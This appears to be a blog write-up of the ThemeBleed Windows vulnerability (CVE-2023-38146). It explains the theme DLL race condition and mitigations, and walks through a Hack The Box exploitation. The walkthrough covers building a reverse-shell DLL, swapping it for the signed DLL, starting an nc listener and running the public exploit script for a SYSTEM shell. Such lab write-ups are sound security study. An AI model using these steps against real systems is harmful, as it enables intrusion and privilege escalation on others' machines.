Understanding CVE-2023-38146: Deep Dive into the ThemeBleed Vulnerability

2024.05.11

4 mins to read

Home / Articles / Understanding CVE-2023-38146: Deep Dive into the ThemeBleed Vulnerability

Understanding CVE-2023-38146: ThemeBleed Windows Vulnerability:

ThemeBleed (CVE-2023-38146) represents a critical vulnerability in Windows Theme Feature that allows local privilege escalation through improper handling of theme binary data.

What is ThemeBleed?

ThemeBleed is a security vulnerability in the Windows Theme Binary Data feature where improper handling of theme files can lead to:

Local privilege escalation
Arbitrary file read
Potential system compromise

Technical Deep Dive:

Component Overview:

The vulnerability exists in several key Windows components:

Affected Components:
├── Theme Binary Data Parser
│   ├── Handles .THEME and .MSSTYLES files
│   └── Responsible for version validation
├── Windows Theme Service
│   ├── Loads theme resources
│   └── Manages DLL verification
└── Desktop Window Manager
    ├── Applies visual themes
    └── Executes theme components

Discovery Background:

Security researcher Will Kirkpatrick discovered this vulnerability while investigating uncommon Windows file formats, specifically focusing on the .THEME format used for Windows visual customization.

Vulnerability Details:

The vulnerability involves several key components:

Theme Components:
├── .THEME files
│   └── Contains appearance settings
├── .MSSTYLES files
│   ├── Should only contain graphical resources
│   └── No executable code intended
└── Version handling
    ├── Special "999" version number
    └── Improper DLL validation

Race Condition Exploitation:

The core issue lies in the handling of .MSSTYLES files when a specific version number (999) is used:

Initial DLL Verification:
- System checks “_vrf.dll” signature
- Validates file integrity
Race Window:
- Time gap between verification and loading
- Allows DLL replacement
- Original verification becomes invalid
Exploitation:
- Malicious DLL can be substituted
- System loads replaced DLL
- Arbitrary code execution achieved

Distribution Vector:

The vulnerability has two interesting distribution aspects:

Direct Theme Files:
- Downloads trigger mark-of-the-web warnings
- Users receive security prompts
- Some protection provided
THEMEPACK Bypass:
- .THEMEPACK files are CAB archives
- Automatically extract and apply themes
- Bypass mark-of-the-web protection
- No security warnings shown

Real-World Exploitation Example:

This was performed on the hack the box machine Aero:
- https://app.hackthebox.com/machines/Aero

Available Proof of Concept:

A public POC for the ThemeBleed exploit is available at:

https://github.com/Jnnshschl/CVE-2023-38146
- The creator has also written a blog-post to accompany the POC.
+Note+: There are multiple POC’s however this is just my preffered one.

Exploitation Process

Payload Preparation:
- Create malicious DLL containing reverse shell code
- Configure connection parameters (IP, port)
- Compile in Release mode for target architecture
Exploit Setup:

Directory Structure:
└── exploit_root/
    ├── tb/
    │   └── Aero.msstyles_vrf_evil.dll # Our compiled reverse shell DLL that gains SYSTEM
    │   └── Aero.msstyles              # Modified theme file that triggers the exploit
    │   └── Aero.msstyles_vrf.dll      # Legitimate Microsoft-signed DLL we race against
    └── themebleed.py                  # Python script that orchestrates the attack

Execution Flow:
- Attacker starts listener on control server
- Exploit script triggers theme loading
- Race condition allows DLL substitution
- Reverse shell connects to attacker

Building the ThemeBleed CVE-2023-38146 Reverse Shell DLL:

The exploit requires a reverse shell DLL. A POC for this is available at:

https://github.com/Jnnshschl/ThemeBleedReverseShellDLL

Development Environment Setup
- Windows 10 VM (my preffered version is setup using Mandiant Commando script)
  - Visual Studio +(not Visual Studio Code+)

Building Process
1. Open Visual Studio and clone the repo:
2. Configure attack parameters:
  - Locate main.cpp
  - Set attack IP and port (lines 32/34)
  - Set “autoReconnect” to false
3. Prepare for compilation:
  - Set to release mode
1. Build the solution:
  - +Note+: “Building the solution” means compiling the exploit
1. Locate the compiled DLL at:
  - C:\Users\[YourUserName]\source\repos\ThemeBleedReverseShellDLL\x64\Release\ThemeBleeedReverseShell.dll

Executing the Exploit

Clone the main exploit repository: git clone https://github.com/Jnnshschl/CVE-2023-38146.git
Prepare the payload:
- Move ThemeBleeedReverseShell.dll to the tb folder
- Rename it to Aero.msstyles_vrf_evil.dll
+Note+: The repository mentions td folder but it’s actually tb
Start the listener: rlwrap -cAr nc -nvlp 4711
Execute the exploit: python3 themebleed.py -r [MYAttackMachine] --no-dll
Receive the connection:

Impact Analysis:

Affected Systems:

Windows Version	Architecture	Vulnerable
Windows 11	x64	Yes
Windows 10	x64	Yes
Server 2019	x64	Yes
Server 2022	x64	Yes

Security Implications:

The vulnerability can lead to:

Local privilege escalation
System compromise
Unauthorized file access

Mitigation:

Mitigation Strategies

System Updates:
- Apply latest Windows security updates
- Enable automatic updates
Access Controls:

# PowerShell: Restrict theme directory access
$acl = Get-Acl "C:\Windows\Resources\Themes"
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
    "Users","Read","Allow")
$acl.SetAccessRule($rule)
Set-Acl "C:\Windows\Resources\Themes" $acl

Group Policy Settings:
- Disable theme changes for standard users
- Restrict access to theme directories

Prevention Best Practices

System Hardening:
- Implement principle of least privilege
- Regular security updates
- Monitor theme-related activities
Security Controls:
- Application control policies
- User access restrictions
- System monitoring
- Block .THEMEPACK files at network edge
- Monitor DLL loading during theme changes